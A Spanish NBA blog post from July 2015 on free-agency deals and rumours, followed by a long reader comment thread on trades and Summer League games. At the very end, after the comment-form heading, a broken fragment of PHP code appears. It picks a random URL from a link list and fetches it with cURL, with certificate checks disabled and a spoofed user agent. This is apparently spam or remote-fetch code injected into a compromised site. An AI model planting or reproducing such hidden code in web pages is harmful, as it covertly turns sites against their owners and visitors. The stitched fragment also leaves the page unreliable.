Mercado NBA: A la espera de Lamarcus y DeAndre

03 de July de 2015 por txusma

Un día más de mercado y nueva serie de contratos y acuerdos firmados, aunque hay otros que están a la espera de que caigan las 2 piezas más codiciadas del mercado:

Dwyane Wade: 20×1, Heat
Greg Monroe: 50×3, Bucks*
Monta Ellis: 40×4, Pacers*
Arron Afflalo: 16×2, Knicks
Walter Tavares: 7×3, Hawks
Lavoy Allen: 12×3, Pacers
Ed Davis: 20×3, Blazers*
Thomas Robinson: 3×2, Nets (player option en el segundo año)
Shane Larkin: 3×2, Nets* (player option en el segundo año)
James Anderson: Kings (contrato multianual pero no se conocen las cantidades)
Aaron Baynes: 20×3, Pistons* 

Además, Wesley Matthews y Robin Lopez han llegado a un acuerdo con los Dallas Mavericks y los New York Knicks, respectivamente pero ambos están pendientes de las decisiones de Lamarcus Aldridge y DeAndre Jordan. El primero, que rechazó una oferta de 64×4 de los Kings, para conocer la cantidad exacta que recibirá y el segundo para saber si realmente jugará en los Knicks porque es el segundo plato de la franquicia de la Gran Manzana.

Otro día más la mayoría de rumores giran en torno a Lamarcus y DeAndre. El ex de los Blazers necesita tiempo para decidir entre tanta opción. Se ha reunido por segunda vez con los Lakers (que pidieron de rodillas una segunda oportunidad) pero son Spurs y Suns los que parecen llevar la delantera. La franquicia de Arizona ya le ha empezado a hacer hueco empaquetando a Marcus Morris, Reggie Bullock y Danny Granger a los Detroit Pistons aunque aún necesitaría traspasar a PJ Tucker o Markieff Morris para tener el espacio necesario para firmar a Aldridge y a Tyson Chandler, con el que ya llegaron a un acuerdo.  Durante algún momento del día se especuló con que los Miami Heat se podrían haber metido en la pelea pero este punto no está del todo confirmado. Los Dallas Mavericks son los terceros en discordia.

En el caso de DeAndre Jordan la decisión parece estar 50-50 entre Mavs y Clippers. Knicks y Lakers no pierden las esperanzas pero lo tienen difícil, difícil.

Otros jugadores que no han firmado todavía son David West, que parece estar entre Spurs y Wizards, y Rajon Rondo, sobre el que los Lakers han demostrado algún tipo de interés vete a saber tú porqué extraña razón. Y hablando de los Lakers os preguntaréis, ¿y qué pasa con su juego interior? Pues una vez parece que se les van a escapar todos y cada uno de los agentes libres de su agrado se van a dedicar a firmar contratos cortos y nada pesados a jugadores como Jason Smith, Kosta Koufos o Amare Stoudemire.

Comenta

17 comentarios a esta entrada

  1. Triceratops dice:
    #1

    Tobias Harris sigue de momento en Orlando, 64×4. Buen movimiento de Orlando, tal y como se ha puesto el mercado, retenerlo por 16 kilos al año me parece barato.
    Y CJ Watson tambien llega a Orlando.

      Citar

  2. Schize dice:
    #2

    DeAndre a Mavs, 80 x 4

      Citar

  3. Triceratops dice:
    #3

    Rondo a Kings un año por 10 kilos. Collison lo había hecho fenomenal, pero Rondo es mas mediatico y venderá mas camisetas. Imagino que traspasaran a Collison a cambio de un PF.

    Derrick Williams a Knicks, por 10×2. No sé que piensas Vader, con Afflalo, Lopez, y Williams ganareis mas partidos que el año anterior, cosa que no es muy dificil, pero en mi opinión, no aspirais a cotas muy altas con esta gente. Afflalo es un solido jugador y un gran profesional, si me parece un fichaje acertado por precio y calidad, pero D Williams es un jugador muy mediocre que apenas ha hecho nada jugando en equipos muy malos. Y sobre Lopez, es un pivot de lo mas normalito. A la espera de ver que plantilla se os queda en Octubre, si no llega alguien de mas peso, creo que os quedareis otro año fuera de PO. Al base rookie que teneis no lo conozco, pero Porzingis no creo que pueda aportar mucho en su primer año. Con su debil físico, apenas va a poder defender, rebotear ó postear. Solo podrá hacer tiros abiertos y cazar algun que otro alley-opp, pienso.

      Citar

  4. Triceratops dice:
    #4

    Wow ,,,,,y Beverley 25×4 para seguir en los Rockets. Tal y como está el mercado, me parece un chollo conseguir que un base correcto digno de ser titular firme por 6’25 kilos al año.

      Citar

  5. Vader dice:
    #5

    @Triceratops

    De este periodo de AL y draft me queda una sensación agridulce con mis Knicks. Agria porque no hemos podido dar un gran salto como hubiera sido firmar una gran amenaza en el poste, esto nos podría haber llegado via draft con Okafor o Towns o via AL con Gasol, Aldridge o Monroe (los dos primeros unas quimeras pero el tercero fue una posibilidad real).

    A partir de aquí vienen las buenas noticias en mi opinión. Phil Jackson no se ha vuelto loco haciendo traspasos a toda prisa para intentar montar un equipo para ya, y tampoco sobrepagando jugadores para no llegar a ningún lado. La herencia recibida en forma de contratos malos, pocas rondas del draft y un sólo all-star indiscutible que estaba a punto de terminar contrato y que el verano pasado estaba con un pie fuera, era demasiado pesada para darle la vuelta en un sólo año.

    Creo que este verano se han puesto las bases para seguir avanzando de la única forma que permite hoy en día la NBA, paso a paso y tomando buenas decisiones. El verano que viene Knicks volverá a tener un buen espacio salarial, seguramente la imagen del equipo será mucho mejor que la del año pasado y eso puede atraer a los próximos AL.

    Si Melo esta sano todo el año yo aún no descarto playoff este año. Eso si, hemos de tener un poco de suerte con las lesiones porque la plantilla no será muy larga en cuanto a calidad. Pero tenemos unos cuantos jugadores con experiencia y algún joven interesante.

    Porzingis jugará abierto esperando el tiro de media, larga distancia. Yo no descarto que pueda aportar más de lo esperado este mismo año. R.Lopez nos dará la tan necesitada defensa cerca del aro y por supuesto rebote. Lo de D.Williams lo veo como una apuesta sobre un jugador en teoria con mucha calidad pero que aún no ha pegado el salto. Tiene buen tiro abierto así que podría funcionar. Sea como sea es un contrato que si te hace falta es fácil de traspasar. Lo mismo que el de Afflalo y R.Lopez. Creo que eso es una cosa buena, seguimos teniendo flexibilidad y el equipo desde luego ha mejorado.

    A parte de Porzingis en quien tengo mucho ilusión es en Grant. Dicen que puede ser uno de los robos del draft… ojalá.

    Este próximo año será muy importante para nosotros. Esperemos que nos acompañe un poco la suerte con los nuevos jugadores y con las lesiones. Con todo esto y con Phil a los mandos estoy seguro que seguiremos mejorando. Esperar un cambio radical de los Knicks en un sólo año con las bases tan malas que había era poco realista y yo nunca lo creí posible. Repito, con lo que había me quedo bastante contento. Lastima lo de Monroe, hubiera sido un paso un poco más grande hacía donde queremos llegar.

    Saludos

      Citar

  6. Schize dice:
    #6

    Parece ser que Aldridge ha anunciado en Twitter su intención de firmar por San Antonio

      Citar

  7. Triceratops dice:
    #7

    Vader, lo que me llama la atención es la poca capacidad de atracción que tiene Melo, parece como que ningun FA gordo quisiese jugar con él. Y con un mercado tan grande como el de NY debe ser decepcionante para la franquicia que Monroe prefiera irse a un equipo de ciudad pequeña antes que allí.

      Citar

  8. Triceratops dice:
    #8

    Bueno, estoy viendo el Orlando Blue – Clippers de la Summer League.
    Sensacional Aaron Gordon marcando diferencias entre los “adultos” y los niños. 18 puntos, 9 rebotes y 7 de 12 en TC jugando de SF al descanso. Entre las muchas cosas que debe mejorar, su manejo de balón, cuando dribla, parece que se desparrama en mil pedazos.
    Muy mal Payton hasta el momento, y Hezonja apenas ha jugado, por lo que no ha podido demostrar nada.

    Por los Clippers, el mejor es un tal Wolters que me suena que jugaba en Milwaukee hace un par de años, hizo buenos partidos y luego cayó en el olvido.

      Citar

  9. Triceratops dice:
    #9

    Raptors firman a Biyombo por 6×2. Magnifico fichaje, yo lo quería como C suplente de Vucevic. Por ese precio, es un chollo.

      Citar

  10. Triceratops dice:
    #10

    Triceratops:
    Bueno, estoy viendo el Orlando Blue – Clippers de la Summer League.
    Sensacional Aaron Gordon marcando diferencias entre los “adultos” y los niños. 18 puntos, 9 rebotes y 7 de 12 en TC jugando de SF al descanso. Entre las muchas cosas que debe mejorar, su manejo de balón, cuando dribla, parece que se desparrama en mil pedazos.
    Muy mal Payton hasta el momento, y Hezonja apenas ha jugado, por lo que no ha podido demostrar nada.

    Por los Clippers, el mejor es un tal Wolters que me suena que jugaba en Milwaukee hace un par de años, hizo buenos partidos y luego cayó en el olvido.

    Gana Orlando Blue en la prórroga por un punto (75-74) gracias a un triple de Hezonja a falta de 12 segundos. Sensacional Gordon, especialmente en la primera parte. Finalmente acabó con un 22-18 y 8 de 18 en TC jugando mayormente de SF. Partidazo también de Devyn Marble, y bien Hezonja yendo de menos a más en el partido, asumiendo protagonismo al final. Respecto a Payton, pésimo partido el suyo.

      Citar

  11. Vader dice:
    #11

    Triceratops:
    Vader, lo que me llama la atención es la poca capacidad de atracción que tiene Melo, parece como que ningun FA gordo quisiese jugar con él. Y con un mercado tan grande como el de NY debe ser decepcionante para la franquicia que Monroe prefiera irse a un equipo de ciudad pequeña antes que allí.

    Sinceramente no creo que sea un tema de Melo. Hoy en día en la NBA los grandes agentes libres buscan firmar por equipos en donde ellos sean la “guinda” del pastel, donde encajen a la perfección para competir enseguida por el anillo o llegar muy lejos en playoff. Lo vimos el año pasado con Howard y este año con Aldridge, Monroe y Jordan (este a parte de ir a un equipo de playoff busca más protagonismo en ataque).

    Los Knicks por mucho que tengan a Melo el año pasado ganaron 17 partidos… a parte de Melo contaban al entrar en la AL con dos rookies, uno de ellos de sólo 19 años, que por mucho potencial que tenga no rendirá desde el primer año.

    Por tanto los Knicks serán atractivos para los AL el próximo verano si durante este año hay algún traspaso de jóvenes y/o rondas a cambio de veteranos que acompañen a Melo y que pongan el equipo en una situación de ganar desde ya. Si no es así el próximo verano se irán sumando piezas sin más y quizás vemos a Melo traspasado.

    Para resumir y que se entienda lo que quiero decir XD, cuando Porzingis y Grant ganen partidos los Knicks serán interesantes para los agentes libres, la pregunta es, ¿Estará allí Melo para verlo?

      Citar

  12. Triceratops dice:
    #12

    Ahhh Vader, nos acabais de quitar a mi perro gordo Kyle O’quinn. Buen jugador de equipo, se faja bien bajo aros y es muuuy productivo. Eso si, tampoco os sacara de pobres, pero un 16×4 lo veo bastante bien. Orlando debio igualar la oferta, pero no lo habran considerado oportuno.
    Creo que como no os queda mucho margen, se va a hacer mediante sign and trade, asi que imagino nos dareis algun paquete a cambio. Espero que no sea Quincy Acy. Ya veremos..

      Citar

  13. Jose Luis dice:
    #13

    Precisamente Quincy Acy lleva mucho tiempo sonando para los Magic xD

      Citar

  14. Triceratops dice:
    #14

    Vale, ya lo tengo, KOQ se marcha a cambio de cash y una 2° ronda de 2019, es decir, que lo hemos regalado. Espero que Hennigan tenga un plan B en mente, porque necesitamos un PF/C que defienda, este tio era el unico que defendia bajo aros. Gran fichaje del tio Phil

      Citar

  15. Triceratops dice:
    #15

    Y lo de los Pacers es para coger a Larry Bird y al GM e hincharlos a ostias. ¿de verdad no habia mejores opciones que regalar a Hibbert a Lakers?

    Joder, vale que lleva 2 años a un nivel mediocre, pero los bigardos de 7 pies siempre son valiosos. Con lo desesperados que estan los Clippers o los Suns por un pivot, seguro que les habrian ofrecido algo mejor a cambio. Es que no le han sacado a LAL ni una misera ronda de draft futura, oiga!

    Un desastre, vamos ….y ahora que? Con quien rellenas el C? Con Jordan Hill, quizas???
    Si no hubiesen fichado a Monta Ellis, pues al menos sabriamos que estaban tankeando y que el traspaso de George estaria al caer, pero es que ni eso..

      Citar

  16. Vader dice:
    #16

    Precisamente iba a comentar que nos hacía falta algún PF más de perfil defensivo… XD

    A ver que pasa con Jason Smith, ojalá lo puedan retener. Supongo que el que seguro que no sigue es Bargniani…

    El tema Hibbert creo que teneis razón, los mismos Clippers no darían algo? Deben estar ahora mismo deseperados, un Hibbert traspasado por “algo” les hubiera dado la vida.

    Saludos!!

      Citar

  17. Vader dice:
    #17

    Triceratops:
    Vale, ya lo tengo, KOQ se marcha a cambio de cash y una 2° ronda de 2019, es decir, que lo hemos regalado. Espero que Hennigan tenga un plan B en mente, porque necesitamos un PF/Cque defienda, este tio era el unico que defendia bajo aros. Gran fichaje del tio Phil

    El trade es a cambio de dinero y del derecho de Magic a cambiar ese año su segunda ronda por la de NY. O sea, Magic se podrá quedar con la segunda ronda más baja de las dos 😛

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>